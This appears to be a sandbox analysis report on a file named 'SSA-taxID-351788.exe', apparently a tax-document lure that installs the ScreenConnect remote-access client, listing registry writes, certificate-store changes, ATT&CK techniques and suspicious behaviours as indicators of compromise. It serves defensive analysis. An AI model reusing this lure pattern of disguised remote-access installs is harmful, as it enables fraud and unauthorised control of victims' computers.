Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_f81da3150aaf7bc7	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\DigestValue = 334202965b07ab69f08b16fed0ee6c7274463556	dfsvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "3L930XL4C0AQLR8T7C0Q8BYL"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0009_none_fbe0c2da0011fbbd\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\SizeOfStronglyNamedComponent = e04f040000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files\ScreenConnect.WindowsFileManager.exe.conf = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\ComponentStore_RandomString = "HY3JQD3EY6XVDHRKP5E68TO2"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92d10b8e9\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_20 = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files\ScreenConnect.WindowsBackstageShell.exe.c = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\implication!scre..tion_25b0fbb6ef7eb094_0017.0009_208965e = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!0600000044b8570e1c120000e4010000000000000000000 = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\lock!02000000c1b8570e400f00009c060000000000000000000 = 30303030306634302c30316461383035396633663630306566	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre..dows_4b14c015c87c1ad8_0017.0009_none_6a433ce92	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924\SizeOfStronglyNamedComponent = b009010000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\lock!0400000044b8570e1c120000e4010000000000000000000 = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\scre..tion_25b0fbb6ef7eb = 3c004100700070006c00690063006100740069006f006e00540072007500730074002000760065007200730069006f006e003d002200310022000d000a00460075006c006c004e0061006d0065003d002200680074007400700073003a002f002f0066006500610074007500720065002e00730063007200650065006e0063006f006e006e006500630074002e0063006f006d002f00420069006e002f00530063007200650065006e0043006f006e006e006500630074002e0043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002300530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006100700070006c00690063006100740069006f006e002c002000560065007200730069006f006e003d00320033002e0039002e00310030002e0038003800310037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002f00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f007700730043006c00690065006e0074002e006500780065002c002000560065007200730069006f006e003d00320033002e0039002e00310030002e0038003800310037002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d0032003500620030006600620062003600650066003700650062003000390034002c002000700072006f0063006500730073006f0072004100720063006800690074006500630074007500720065003d006d00730069006c002c00200074007900700065003d00770069006e003300320022000d000a00540072007500730074006500640054006f00520075006e003d002200740072007500650022000d000a0050006500720073006900730074003d002200740072007500650022003e000d000a003c00440065006600610075006c0074004700720061006e0074003e000d000a003c0050006f006c00690063007900530074006100740065006d0065006e0074002000760065007200730069006f006e003d002200310022003e000d000a003c005000650072006d0069007300730069006f006e00530065007400200063006c006100730073003d002200530079007300740065006d002e00530065006300750072006900740079002e005000650072006d0069007300730069006f006e0053006500740022000d000a00760065007200730069006f006e003d002200310022000d000a00490044003d00220043007500730074006f006d0022000d000a00530061006d00650053006900740065003d002200730069007400650022000d000a0055006e0072006500730074007200690063007400650064003d002200740072007500650022000d000a0078006d006c006e0073003a00610073006d00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600310022000d000a0078006d006c006e0073003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a00610073006d00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600320022000d000a0078006d006c006e0073003a007800730069003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300031002f0058004d004c0053006300680065006d0061002d0069006e007300740061006e006300650022000d000a0078006d006c006e0073003a0063006f002e00760031003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600310022000d000a0078006d006c006e0073003a00610073006d00760033003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a00610073006d002e007600330022000d000a0078006d006c006e0073003a0064007300690067003d00220068007400740070003a002f002f007700770077002e00770033002e006f00720067002f0032003000300030002f00300039002f0078006d006c006400730069006700230022000d000a0078006d006c006e0073003a0063006f002e00760032003d002200750072006e003a0073006300680065006d00610073002d006d006900630072006f0073006f00660074002d0063006f006d003a0063006c00690063006b006f006e00630065002e007600320022003e000d000a003c0049005000650072006d0069007300730069006f006e00200063006c006100730073003d002200530079007300740065006d002e004e00650074002e005700650062005000650072006d0069007300730069006f006e002c002000530079007300740065006d002c002000560065007200730069006f006e003d0032002e0030002e0030002e0030002c002000430075006c0074007500720065003d006e00650075007400720061006c002c0020005000750062006c00690063004b006500790054006f006b0065006e003d00620037003700610035006300350036003100390033003400650030003800390022000d000a00760065007200730069006f006e003d002200310022003e000d000a003c0043006f006e006e006500630074004100630063006500730073003e000d000a003c0055005200490020007500720069003d00220028006800740074007000730029003a002f002f0066006500610074007500720065005c002e00730063007200650065006e0063006f006e006e006500630074005c002e0063006f006d002f002e002a0022002f003e000d000a003c002f0043006f006e006e006500630074004100630063006500730073003e000d000a003c002f0049005000650072006d0069007300730069006f006e003e000d000a003c002f005000650072006d0069007300730069006f006e005300650074003e000d000a003c002f0050006f006c00690063007900530074006100740065006d0065006e0074003e000d000a003c002f00440065006600610075006c0074004700720061006e0074003e000d000a003c004500780074007200610049006e0066006f00200044006100740061003d00220030003000300031003000300030003000300030004600460046004600460046004600460030003100300030003000300030003000300030003000300030003000300030003000430030003200300030003000300030003000350037003500330037003900370033003700340036003500360044003200450035003700360039003600450036003400360046003700370037003300320045003400360036004600370032003600440037003300320043003200300035003600360035003700320037003300360039003600460036004500330044003300340032004500330030003200450033003000320045003300300032004300320030003400330037003500360043003700340037003500370032003600350033004400360045003600350037003500370034003700320036003100360043003200430032003000350030003700350036003200360043003600390036003300340042003600350037003900350034003600460036004200360035003600450033004400360032003300370033003700360031003300350036003300330035003300360033003100330039003300330033003400360035003300300033003800330039003000350030003100300030003000300030003000330030003500330037003900370033003700340036003500360044003200450035003300360035003600330037003500370032003600390037003400370039003200450035003000360046003600430036003900360033003700390032004500340031003700300037003000360043003600390036003300360031003700340036003900360046003600450035003400370032003700350037003300370034003400350037003800370034003700320036003100340039003600450036003600360046003000310030003000300030003000300031003800370032003600350037003100370035003600350037003300370034003700330035003300360038003600350036004300360043003400390036004500370034003600350036003700370032003600310037003400360039003600460036004500300030003000310030003200300030003000300030003000300030003000420022002f003e000d000a003c002f004100700070006c00690063006100740069006f006e00540072007500730074003e000d000a000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0009_none_65cb6507f0c2a5b9\lock!0c00000044b8570e1c120000e4010000000000000000000 = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\lock!0a00000044b8570e1c120000e4010000000000000000000 = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c3	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0017.0009_none_171efd5086820924	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_208965e6b5aa6dc2\appid = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\lock!1100000044b8570e1c120000e40100000000000000000000d1bb = 30303030313231632c30316461383035396534373237366364	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\identity = 68747470733a2f2f666561747572652e73637265656e636f6e6e6563742e636f6d2f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e392e31302e383831372c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_f980a3533165990d\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c3 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0009_none_aa62037c34f7a445\lock!12000000d0b8570e400f00009c060000000000000000000 = 30303030306634302c30316461383035396633663630306566	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\StateStore_RandomString = "7YXB4H49WDOVL7LP3Y4PBZDH"	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0009_none_4b563d129b766e28\SizeOfStronglyNamedComponent = 3cf2010000000000	dfsvc.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	SSA-taxID-351788.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	SSA-taxID-351788.exe
Key created	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	SSA-taxID-351788.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	SSA-taxID-351788.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	SSA-taxID-351788.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	SSA-taxID-351788.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
4052	ScreenConnect.WindowsClient.exe
2296	ScreenConnect.WindowsClient.exe
1860	ScreenConnect.WindowsClient.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe
3772	ScreenConnect.ClientService.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4636	dfsvc.exe
Token: SeDebugPrivilege	3772	ScreenConnect.ClientService.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe
4052	ScreenConnect.WindowsClient.exe

Suspicious use of SendNotifyMessage 5 IoCs

pid	Process
4052	ScreenConnect.WindowsClient.exe
